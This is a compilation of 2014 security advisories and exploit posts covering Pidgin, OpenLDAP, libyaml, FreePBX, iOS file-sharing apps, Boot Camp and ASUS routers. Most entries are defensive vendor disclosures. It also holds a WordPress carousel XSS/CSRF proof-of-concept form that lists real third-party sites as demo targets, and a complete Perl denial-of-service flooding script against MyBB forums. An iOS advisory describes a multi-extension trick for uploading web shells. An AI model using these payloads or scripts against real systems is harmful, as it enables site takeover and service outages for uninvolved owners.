Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln
# Exploit : centerbWordpress all_in_one_carousel Plugin Xss Csrf Vulnerability /centerbrbr html head titleWordpress all_in_one_carousel Plugin Xss Csrf Vulnerability [IeDb TeaM]/title /headbody form action=\http://YourTarget.Com\; id=\formid\ method=\post\ input name=\name\ value=\'\scriptalert(/IeDb.ir/)/script\' /brbr input type=\submit\ value=\Submit\/ /form/body/html # # XSS Code : \scriptalert(/IeDb.ir/)/script # # Vulnerable Page : # # Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php # # # [+] Image : http://sectime.ir/myfiles/Xss-wp.png # # # # D3m0 : # # http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php # # # Gr33tz : All Members In IeDb.Ir/acc | Thanks : 8ThBit , Dr.3v1l And ### # Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04] ###
WiFi Camera Roll v1.2 iOS - Multiple Web Vulnerabilities
Document Title: === WiFi Camera Roll v1.2 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1192 Release Date: = 2014-02-08 Vulnerability Laboratory ID (VL-ID): 1192 Common Vulnerability Scoring System: 7.9 Product Service Introduction: === Download or upload photos/videos via WiFi! It is a easy way to wirelessly access your photos/videos in camera roll on devices. It only needs a web browser and not depends on any other transfer utilities. Just start the app and input the address into the address bar of your browser, you can browser the photos/videos in camera roll on your device. What`s more, you can upload photos/videos and it will help you save them into camera roll automatically. - You can browser the photos in camera roll on device - Download photos in full-size with EXIF metadata - Upload the specified format images into camera roll - Optional password protection for the web interface - One app compatible for both iPhone and iPad - Support major browsers e.g. Safari, Chrome, IE, etc. - A web browser is enough and not depends on flash, java, etc. - [NEW] Download unmodified HD quality video - [NEW] Upload specified format videos directly into your camera roll - [NEW] View photo gallery in web browser I`m always keeping this app concise and easy to use. It is just a bridge to connect your iPhone/iPad and computer. All photos and videos are saved in your system album and your computer. So it is safe and won`t lost even if you accidentally delete this app. (Copy of the Homepage: https://itunes.apple.com/ch/app/wifi-camera-roll/id576954110 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official WiFi Camera Roll v1.2 iOS mobile web-application. Vulnerability Disclosure Timeline: == 2014-02-08:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Apple AppStore Product: WiFi Camera Roll (iOS) - Application 1.2 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: 1.1 A local file/path include web vulnerability has been discovered in the official WiFi Camera Roll v1.2 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the web-application or mobile device. The local file include web vulnerability is located in the vulnerable `qqfile` name value of the `upload files` module (web-interface). Remote attackers are able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path include execute occcurs in the main file index section after the refresh of the file upload. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.8(+)|(-)7.9. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized local file include web attacks. Request Method(s): [+] [POST] Vulnerable Input(s): [+] Upload Files Vulnerable Parameter(s): [+] filename qqfile Affected Module(s): [+] Access from Computer (File Dir Index List - Folder/Category to path=/) 1.2 An arbitrary file upload web vulnerability has been discovered in the official WiFi Camera Roll v1.2 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. The vulnerability is located in the `upload file` (video and images) module. Remote attackers are able to upload a php or js web-shells by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `image.gif.jpg.html.js.aspx.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg .gif file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring
[ MDVSA-2014:025 ] pidgin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:025 http://www.mandriva.com/en/support/security/ ___ Package : pidgin Date: February 11, 2014 Affected: Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in pidgin: The Yahoo! protocol plugin in libpurple in Pidgin before 2.10.8 does not properly validate UTF-8 data, which allows remote attackers to cause a denial of service (application crash) via crafted byte sequences (CVE-2012-6152). Multiple integer signedness errors in libpurple in Pidgin before 2.10.8 allow remote attackers to cause a denial of service (application crash) via a crafted timestamp value in an XMPP message (CVE-2013-6477). gtkimhtml.c in Pidgin before 2.10.8 does not properly interact with underlying library support for wide Pango layouts, which allows user-assisted remote attackers to cause a denial of service (application crash) via a long URL that is examined with a tooltip (CVE-2013-6478). util.c in libpurple in Pidgin before 2.10.8 does not properly allocate memory for HTTP responses that are inconsistent with the Content-Length header, which allows remote HTTP servers to cause a denial of service (application crash) via a crafted response (CVE-2013-6479). libpurple/protocols/yahoo/libymsg.c in Pidgin before 2.10.8 allows remote attackers to cause a denial of service (crash) via a Yahoo! P2P message with a crafted length field, which triggers a buffer over-read (CVE-2013-6481). Pidgin before 2.10.8 allows remote MSN servers to cause a denial of service (NULL pointer dereference and crash) via a crafted (1) SOAP response, (2) OIM XML response, or (3) Content-Length header (CVE-2013-6482). The XMPP protocol plugin in libpurple in Pidgin before 2.10.8 does not properly determine whether the from address in an iq reply is consistent with the to address in an iq request, which allows remote attackers to spoof iq traffic or cause a denial of service (NULL pointer dereference and application crash) via a crafted reply (CVE-2013-6483). The STUN protocol implementation in libpurple in Pidgin before 2.10.8 allows remote STUN servers to cause a denial of service (out-of-bounds write operation and application crash) by triggering a socket read error (CVE-2013-6484). Buffer overflow in util.c in libpurple in Pidgin before 2.10.8 allows remote HTTP servers to cause a denial of service (application crash) or possibly have unspecified other impact via an invalid chunk-size field in chunked transfer-coding data (CVE-2013-6485). gtkutils.c in Pidgin before 2.10.8 on Windows allows user-assisted remote attackers to execute arbitrary programs via a message containing a file: URL that is improperly handled during construction of an explorer.exe command. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3185 (CVE-2013-6486). Integer overflow in libpurple/protocols/gg/lib/http.c in the Gadu-Gadu (gg) parser in Pidgin before 2.10.8 allows remote attackers to have an unspecified impact via a large Content-Length value, which triggers a buffer overflow (CVE-2013-6487). Integer signedness error in the MXit functionality in Pidgin before 2.10.8 allows remote attackers to cause a denial of service (segmentation fault) via a crafted emoticon value, which triggers an integer overflow and a buffer overflow (CVE-2013-6489). The SIMPLE protocol functionality in Pidgin before 2.10.8 allows remote attackers to have an unspecified impact via a negative Content-Length header, which triggers a buffer overflow (CVE-2013-6490). The IRC protocol plugin in libpurple in Pidgin before 2.10.8 does not validate argument counts, which allows remote IRC servers to cause a denial of service (application crash) via a crafted message (CVE-2014-0020). This update provides pidgin 2.10.9, which is not vulnerable to these issues. Additionally a build problem conserning sqlite3 was discovered and fixed, therefore fixed sqlite3 packages is also provided with this advisory. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6152 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6477 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6478 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6479 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6481 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6483 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6484
[SECURITY] [DSA 2860-1] parcimonie security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2860-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso February 11, 2014 http://www.debian.org/security/faq - - Package: parcimonie Vulnerability : information disclosure CVE ID : CVE-2014-1921 Debian Bug : 738134 Holger Levsen discovered that parcimonie, a privacy-friendly helper to refresh a GnuPG keyring, is affected by a design problem that undermines the usefulness of this piece of software in the intended threat model. When using parcimonie with a large keyring (1000 public keys or more), it would always sleep exactly ten minutes between two key fetches. This can probably be used by an adversary who can watch enough key fetches to correlate multiple key fetches with each other, which is what parcimonie aims at protecting against. Smaller keyrings are affected to a smaller degree. This problem is slightly mitigated when using a HKP(s) pool as the configured GnuPG keyserver. For the stable distribution (wheezy), this problem has been fixed in version 0.7.1-1+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 0.8.1-1. We recommend that you upgrade your parcimonie packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJS+o1qAAoJEAVMuPMTQ89ETXcQAJEdl0FJxcIn9/da5PrFYSav b4dJ4OfCWWGdhiLh/REuSeDFUvjQJrgWF/2LaEi6Hz22r9W8K3mZc8ZMnJgvcudn uqS1Z6LUI3Y4xwfh+mdpG5FbdXX4xxzB5EJ1I7+4hXo2YiqtUNAbsZJqzh5gkF2/ cd+RMoOHG7yGMx9jmc3c766hN8c9+wK2Nad2Y7WyRC6l4AWSg5pqWfjMcYh0GXc9 ANQPzS3b+ajJd2RNtTNM05rShq0ic1BJ4RZJjfWthzCWj/3tkYjiLxPrUpuUYqa9 5n6Xq8Jt+EWhCv7P7R0R+VVhX11Ywt5JyjJwTbF6DWrjqwLIc+4jHb3Ww44FZMgK +ODCq6zU3PsIC/HCqfk6YhCa/2MeO++mtCYBVdu6Px2IE5cFe8/ubH2j2rxusyX7 m0ZWopXvLIJgXzTyDwH5M1c0N2wUkLlhywi33z8ySk0yqZnM0rtiAIvGsBsBkoNx DjOJfRSJAmmIGf+7iP+QcsK/ULgt8rvNR2s2OZOmvRoe+Qsp56wYpazDYkSize1f a/PNMA5i9tEWXAm2dL/j/Lg8hL+txxPnluYAyzm2galn/hne/oUlivOW9T/RP4e8 8QOoTyurEukp1/z1SHRMj0bkG2W1ICOnoij8J4NPzdtJ+trMj1ZlMZAbT53X3HEO iqolODfCHkE/z33xBdeX =aX8i -END PGP SIGNATURE-
[CVE-2014-1903] FreePBX 2.9 through 12 RCE
Overview: Unauthenticated user-level Remote Code Execution (RCE) vulnerability in admin/config.php, the main interface to FreePBX. This bug was introduced in FreePBX 2.9, earlier versions are not affected. Score - 8.4 (AV:N/AC:L/Au:N/C:P/I:P/A:C/E:H/RL:OF/RC:C/CDP:MH/TD:ND/CR:L/IR:L/AR:M) Reference to Advisory: http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice Reference to Bug: http://issues.freepbx.org/browse/FREEPBX-7123 Fixed in Versions: 2.9 -- 2.9.0.14 2.10 - 2.10.1.15 2.11 - 2.11.0.23 12 - 12.0.1alpha22 Additional Information: FreePBX contains an automatic alert service for upgrade notifications. If your system is set up correctly, you would have received an email alert of this vulnerability when it was detected and fixed. Schmoozecom strongly urges you to ensure that the email alert address is correct and up to date to ensure you receive notifications of security issues and pending updates. Schmoozecom and FreePBX are very proactive and responsive to security issues, and care deeply about the security of our software and systems. We welcome security related bug reports and issues, and they can be submitted via email to secur...@freepbx.org for instant attention.
[SECURITY] [DSA 2850-2] libyaml regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2850-2 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso February 12, 2014 http://www.debian.org/security/faq - - Package: libyaml Vulnerability : regression Debian Bug : 738587 The security update released in DSA-2850-1 for libyaml introduced a regression in libyaml failing to parse a subset of valid yaml documents. For reference the original advisory text follows. Florian Weimer of the Red Hat Product Security Team discovered a heap-based buffer overflow flaw in LibYAML, a fast YAML 1.1 parser and emitter library. A remote attacker could provide a YAML document with a specially-crafted tag that, when parsed by an application using libyaml, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. For the oldstable distribution (squeeze), this problem has been fixed in version 0.1.3-1+deb6u3. For the stable distribution (wheezy), this problem has been fixed in version 0.1.4-2+deb7u3. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your libyaml packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJS+zTJAAoJEAVMuPMTQ89EuPwP/3fnkxZLkgdy++jOKsR1XYwR S/GYbdJT8x5xghudJoUyi5JiEMpecaDhaayDPbEOjl/BJXO2nwxRdxMk5aaQLEYP kOSBwKgI2SOVi0rCzr0SbtMHv5VQ3+L5f4s4aGiU8R67tITTf3++pDId23lpaMmy FzS6PZSJLgj0mw2YbnYU8eaYky1s0itMX6leBsvXpNck/d0cvKMBn0HJ1DMKEB/A wVq1q5DErkmLVJRjOW4hhe5AayQNV2nXdufzOpXNUwld/bDc2924i0lNKaHHgix9 KovQYbc9uJWLxIyeN2iVPomX3eqNRdMKYfHWYR40sBt0BOj0YpcGuXi4ZYztpaY/ YlZjaGPCWnIKTcuX9a5tlswPDNXSKjlZW8T4vqDvKFXtBzMz16S4AJzjDJvY2btk UQWsppf9Td6yEDZcD9w0aSBkQrV9bX2sFn0xiDUiIpgeeGOPPw1LQvW0xVbNaqpy Fp6N7d4YimAdwfpPT+RbTuF/unLPtpEQru7xWM1mLdtO0dHRqGbExsY758Bad0Me bG2zYIFwlMFDzDM79mgm3CPreqzRxYanlS1iiNbf0mlj/3LixH5JrNJLkHHXK7g/ 01qqc3ZbY+s+CbVB/tbZ1WnB4b6/L3w1U1uI0//wku1w18xO1RLj/0fcWp2xfHaR ICQuHEzKHquT6INOeF/s =xHlV -END PGP SIGNATURE-
jDisk (stickto) v2.0.3 iOS - Multiple Web Vulnerabilities
Document Title: === jDisk (stickto) v2.0.3 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1196 Release Date: = 2014-02-12 Vulnerability Laboratory ID (VL-ID): 1196 Common Vulnerability Scoring System: 9.4 Product Service Introduction: === jDisk turns your iPhone`iPad`iPod into a flash drive / disk. jDisk provides a purely web-based management UI, what you need do is visit it in your browser, no client installation is needed. What`s more, jDisk embeds a native file manager, you can organize your files/folders on your device directly, open files, edit them, preview them, etc. All in all, jDisk empowers your iPhone/iPad, make it work as a moving disk / flash drive. (Copy of the Homepage: https://itunes.apple.com/de/app/jdisk-convert-your-device/id604793088 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official sticktos jDisk v2.0.3 iOS mobile web-application. Vulnerability Disclosure Timeline: == 2014-02-12:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Apple AppStore Product: jDisk (stickto) iOS - Mobile Web Application 2.0.3 Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: 1.1 Multiple remote code execution web vulnerabilities has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application. The vulnerability allows remote attackers to execute unauthorized system specific codes or commands to compromise the affected system/service. The vulnerabilities are located in the `New+ Text file` and `New+ Folder` function of the jdisk wifi application file manager web-interface. Remote attackers are able to inject own system specific codes by manipulation of the folder- file name value in the add procedure. The code execution occurs in the main file dir index and sub category listing, the add new edit file but also in the the app status notification message context. The security risk of the remote code execution vulnerabilities in the add new folder- text file function are estimated as critical with a cvss (common vulnerability scoring system) count of 9.4(+)|(-)9.5. Exploitation of the code execution vulnerability requires no user interaction or privileged mobile web-application user account with password. Successful exploitation of the remote code execution vulnerabilities results in mobile application or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] New/Add Folder [+] New/Add Text File Vulnerable Parameter(s): [+] folder name [+] text-file name Affected Module(s): [+] Index Sub Category - File Dir Listing [+] Notification Message [+] File Edit - Header 1.2 A directory-traversal web vulnerability has been discovered in the official sticktos jDisk v2.0.3 iOS mobile web-application. The vulnerability allows remote attackers to unauthorized access system path variables or web-server data to compromise the application. The local vulnerability is located in the `folderContent to folder` value of the mobile application. Remote attackers can exploit the bug by usage of a manipulated GET method request to unauthorized access app/device paths or folders. The local issue is a classic directory-traversal web vulnerability. The execution of the malicious dt string in the foldercontent to folder path request occurs in the context of the requested interface page itself. The security risk of the directory traversal web vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.6(+)|(-)6.7. Exploitation of the directory traversal web vulnerability requires no user interaction or privileged mobile web-application user account with password. Successful exploitation of the path traversal web vulnerability results in mobile application or connected device component compromise. Request Method(s): [+] [GET] Vulnerable Module(s): [+] __FD__?action Vulnerable Parameter(s): [+] folderContentfolder= Affected Module(s): [+] Index Sub Category - File Dir Listing 1.3 A local file include web vulnerability has been discovered in the official
[ MDVSA-2014:026 ] openldap
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:026 http://www.mandriva.com/en/support/security/ ___ Package : openldap Date: February 12, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been discovered and corrected in openldap: The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier does not properly count references, which allows remote attackers to cause a denial of service (slapd crash) by unbinding immediately after a search request, which triggers rwm_conn_destroy to free the session context while it is being used by rwm_op_search (CVE-2013-4449). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4449 ___ Updated Packages: Mandriva Enterprise Server 5: f6f47a0a0de36f77454b42b7d67cad11 mes5/i586/libldap2.4_2-2.4.11-3.6mdvmes5.2.i586.rpm 6ef1ee5fae026d70c3a940b597c2899c mes5/i586/libldap2.4_2-devel-2.4.11-3.6mdvmes5.2.i586.rpm cff64c1d004f5dcadf58893f54bd2b79 mes5/i586/libldap2.4_2-static-devel-2.4.11-3.6mdvmes5.2.i586.rpm 4bc668febb73c0ce41d928f6bc66aead mes5/i586/openldap-2.4.11-3.6mdvmes5.2.i586.rpm 3c22bef679a50ecaf3ea705089b3b787 mes5/i586/openldap-clients-2.4.11-3.6mdvmes5.2.i586.rpm 5bda4d05eb3c630b915aebde7c80410c mes5/i586/openldap-doc-2.4.11-3.6mdvmes5.2.i586.rpm 95e6338873c0b3643cf0983bcd82a933 mes5/i586/openldap-servers-2.4.11-3.6mdvmes5.2.i586.rpm dea70a29075de07ca438417e5b775856 mes5/i586/openldap-testprogs-2.4.11-3.6mdvmes5.2.i586.rpm 0ad5f08372fb554fff145b9f202f8845 mes5/i586/openldap-tests-2.4.11-3.6mdvmes5.2.i586.rpm 8358868a61a01b5204d032d9674e5728 mes5/SRPMS/openldap-2.4.11-3.6mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 9ac984f57b49bcac9c244dcb2ea25f82 mes5/x86_64/lib64ldap2.4_2-2.4.11-3.6mdvmes5.2.x86_64.rpm ad204d57a8e77c683b18fb57db9df223 mes5/x86_64/lib64ldap2.4_2-devel-2.4.11-3.6mdvmes5.2.x86_64.rpm 0101675decfd5db7f4bcdd2e205e5533 mes5/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.6mdvmes5.2.x86_64.rpm 924c8eb8dce5616f72cfd1c74ec3ffc0 mes5/x86_64/openldap-2.4.11-3.6mdvmes5.2.x86_64.rpm b5483d5352e88095541aa4289c3f762b mes5/x86_64/openldap-clients-2.4.11-3.6mdvmes5.2.x86_64.rpm b2067967b6d3b3eb1a4536b76e8b2052 mes5/x86_64/openldap-doc-2.4.11-3.6mdvmes5.2.x86_64.rpm 6b328f09e078fbcdf8138f60eeb0c3c1 mes5/x86_64/openldap-servers-2.4.11-3.6mdvmes5.2.x86_64.rpm 9517f66ee97e0db3099135fff5c07a19 mes5/x86_64/openldap-testprogs-2.4.11-3.6mdvmes5.2.x86_64.rpm 70b08cd0c8d45322bba7bfbdba2cf202 mes5/x86_64/openldap-tests-2.4.11-3.6mdvmes5.2.x86_64.rpm 8358868a61a01b5204d032d9674e5728 mes5/SRPMS/openldap-2.4.11-3.6mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 1fbea4ddae49067310f9d52862186f12 mbs1/x86_64/lib64ldap2.4_2-2.4.33-2.1.mbs1.x86_64.rpm 3bed34f442d7d99ca6770a0aa334bf0e mbs1/x86_64/lib64ldap2.4_2-devel-2.4.33-2.1.mbs1.x86_64.rpm a10e56dc0d771e8da27059c0d84966fe mbs1/x86_64/lib64ldap2.4_2-static-devel-2.4.33-2.1.mbs1.x86_64.rpm df4a9a4436890707a76fe41c16999800 mbs1/x86_64/openldap-2.4.33-2.1.mbs1.x86_64.rpm 32fd4c412cf89d78e0887734bce10d36 mbs1/x86_64/openldap-clients-2.4.33-2.1.mbs1.x86_64.rpm 958f98530f1119e48d8f6f224d01ca6a mbs1/x86_64/openldap-doc-2.4.33-2.1.mbs1.x86_64.rpm b75dca39829dbca00adc0884e2ca6fbf mbs1/x86_64/openldap-servers-2.4.33-2.1.mbs1.x86_64.rpm 8c4e2d2ef7e480d05ebcf9655adf2a94 mbs1/x86_64/openldap-testprogs-2.4.33-2.1.mbs1.x86_64.rpm 193e318abe419a0689144bf7af70ade6 mbs1/x86_64/openldap-tests-2.4.33-2.1.mbs1.x86_64.rpm 4ebfb4dcbb423c34c48e03e61c96507a mbs1/SRPMS/openldap-2.4.33-2.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux)
Mybb All Version Denial of Service Vulnerability
###
# Mybb All Version Denial of Service Vulnerability
###
#!/usr/bin/perl
#
#
# @@@@@@@ @@@@@ @@@
# @@@@@@@@@ @@ @@@ @@@@@
# @@@@@@@@@@@ @@@ @@ @@@ @@@ @@@
# @@@@@@@@@ @@ @@@ @@@@@ @@@ @@@
# @@@@@@@@@ @ @@@@@ @@
# @@@@@@@@@ @@ @@@ @@@@@ @@
# @@@@@@@@@ @@@@@ @@ @@@@@@ @@@ @@@
# @@@@@@@@@ @@ @@@ @@ @@@@@@ @@@ @@@
# @@@@@@@ @@ @@@@@@ @@@ @@@
#
#
#
# Iranian Exploit DataBase
# Mybb All Version Denial of Service Vulnerability
# Test on Mybb 1.6.12
# Vendor site : www.mybb.com
# Code Written By Amir - iedb.t...@gmail.com - o0_shabgard...@yahoo.com
# Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
# Greats : Medrik - Bl4ck M4n - ErfanMs - TaK.FaNaR - F@riD - N20 - Bl4ck N3T
- 0x0ptim0us - 0Day
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 -
Mr.Zer0 - one alone hacker
# DICTATOR - dr.koderz - E1.Coders - Security - ARTA - ARYABOD - Behnam Vanda -
C0dex - Dj.TiniVini
# Det3cT0r - yashar shahinzadeh And All Members In IeDb.Ir/acc
#
use Socket;
if (@ARGV 2) { usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i10; $i--)
{
$data =
forums%5B%5D=allversion=rss2.0limit=150make=%D8%AF%D8%B1%DB%8C%D8%A7%D9%81%D8%AA+%D9%84%DB%8C%D9%86%DA%A9+%D9%BE%DB%8C%D9%88%D9%86%D8%AF+%D8%B3%D8%A7%DB%8C%D8%AA%DB%8C;
$len = length $data;
$foo = POST .$dir.misc.php?action=syndication HTTP/1.1\r\n.
Accept: * /*\r\n.
Accept-Language: en-gb\r\n.
Content-Type: application/x-www-form-urlencoded\r\n.
Accept-Encoding: gzip, deflate\r\n.
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n.
Host: $host\r\n.
Content-Length: $len\r\n.
Connection: Keep-Alive\r\n.
Cache-Control: no-cache\r\n\r\n.
$data;
my $port = 80;
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,$foo, 0);
syswrite STDOUT, + ;
}
print \n\n;
system('ping $host');
sub usage {
print # \n;
print ## Mybb All Version Denial of Service Vulnerability\n;
print ## Discoverd By Amir - iedb.t...@gmail.com - Id : o0_shabgard_0o \n;
print ## Www.IeDb.Ir/acc - Www.IrIsT.Ir \n;
print # \n;
print ## [host] [path] \n;
print ## http://host.com /mybb/\n;
print # \n;
exit();
};
#
# Archive Exploit = http://www.iedb.ir/exploits-1332.html
#
###
# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-12]
###
APPLE-SA-2014-02-11-1 Boot Camp 5.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 APPLE-SA-2014-02-11-1 Boot Camp 5.1 Boot Camp 5.1 is now available and addresses the following: Boot Camp Available for: Macs running Boot Camp 5 Impact: Loading a malformed executable file may cause memory corruption in the kernel Description: A bounds checking issue existed in the AppleMNT.sys driver's parsing of Portable Executable files. If a Portable Executable file with a malformed header is loaded, this could cause a Boot Camp driver to corrupt kernel memory. The issue was addressed through improved bounds checking. CVE-ID CVE-2014-1253 : MJ0011 of 360 Security Center Boot Camp 5.1 may be obtained via Apple Software Update or from: http://support.apple.com/downloads/ Depending on your Mac model, the downloading file name is one of the following two: The download file name: BootCamp5.1.5621.zip Its SHA-1 digest: 72c71be259474836c17ddd400aca2218660b8aac The download file name: BootCamp5.1.5640.zip Its SHA-1 digest: 2998a7881509a87b22abc6764379c0a33b6ced3a Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJS+rIpAAoJEPefwLHPlZEwM0gQAJ5Ffh3VoQKk/psQJN6ABJar SbijQfk9eILkiO/XDMwrLKmj0183VS1N+xGzLaZqC0wDjwwwUHOJHUGK02+rRPCf pI2NkZeaRJtGeSfC1LjDHbBhToJLY3JbGU8+NiZrWiFwcJMhyHvgcjWQwOvN2X9R jNiHvo5kTBXboaCwBU9NRvWXDmWbCeWPCsAr0WYOsyCMT4fms/2NtygjiregAGBO BL1kDf2BiF+1lcfGD/cQgOyYPrvOhBtIp6//5UhksFY2h90lHu7Dm6FTUKlUyTzh qKVSro4FL87OA2opuPwAOsbX/96XZEgHlHs2mOy2dGkDCZ2LF6KjWARanSIixBFV 2ARsj6ck+O9S+8KBVGEFBPPKN0fNZ7Irhivv/rR+w1AZLMsbLvdGdm4CarrMEogX daPXwiWnMNsWadMVMIeHpjdYprVw/vfIDCqBXwZfLnDeHxtHgMxyNx0uuXrBPDWu HjrB8Uo0/MSp55QyOSY4DLhQWVTC9mNc5CKcMmnmOQtH4niGyXc+D7k2pa7dKHPY NLggsaiNOKiTjUpcgGEOz191Q7vVDGpGCuV81C9k+AYMWToXnffGXYO62zk0NeIH 7sZ9feNCTZHLlFDF0v9KnnyXFLMTcgT0WXtw1RAcBY7UebcaBSS1ljyw45qGo+bA 3J/op5VbemkYblZScFvu =Dlmy -END PGP SIGNATURE- signature.asc Description: Message signed with OpenPGP using GPGMail
ASUS RT Series Routers FTP Service - Default anonymous access
Five ASUS RT series routers suffer from a vendor vulnerability that default FTP service to anonymous access, full read/write permissions. The service, which is activated from the administrative console does not give proper instructions nor indications that the end user needs to manually add a user to the FTP access table. The vendor was first alerted to this issue in late June of 2012, and then four other times officially from July 2012 to December 2012. It was not until January of this year, when the editors for the Norwegian publication IDG/PC World went to ASUS that any official response came. This vulnerability has been exploited aggressively for sometime now, and as a rolling count which has been kept ongoing since July 2012, over 30,000 unique IP address, at one time or another have had their FTP service shared. The FTP services, when not secured, allows for full read/write access to any external storage devices attached to the usb drives on the router. The vendor has issued an official (beta) patch for the RT-AC68U as of mid-January, and plans on additional patches in the coming week. Models Include: RT-AC68U RT-AC56U RT-AC66U RT-N66U RT-N16 CWE-287: Improper Authentication CVSS v2 Vector (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:H/RL:OF/RC:C) CVSS Base Score 9.4 Impact Subscore 9.2 Exploitability Subscore 10 CVSS Temporal Score 8.2 Overall CVSS Score 8.2 Many have reported malware being uploaded into the sync share folders, large amounts of unauthorized file sharing and most importantly the theft of entire hard drives of personal information. Over 7,300 units are still vulnerable to this weakness as of today. It is strongly urged that those with any of the above routers check to ensure that their FTP service has been secured. Links: https://www.asus.com/Networking/RTAC68U/#support http://www.idg.no/pcworld/article281004.ece http://www.thinkbroadband.com/news/6229-new-asus-router-firmware-to-fix-ftp-security-issue.html http://www.pcworld.com/article/2087180/asus-simplifies-router-configuration-to-protect-external-hard-drives.html Research Contact - Kyle 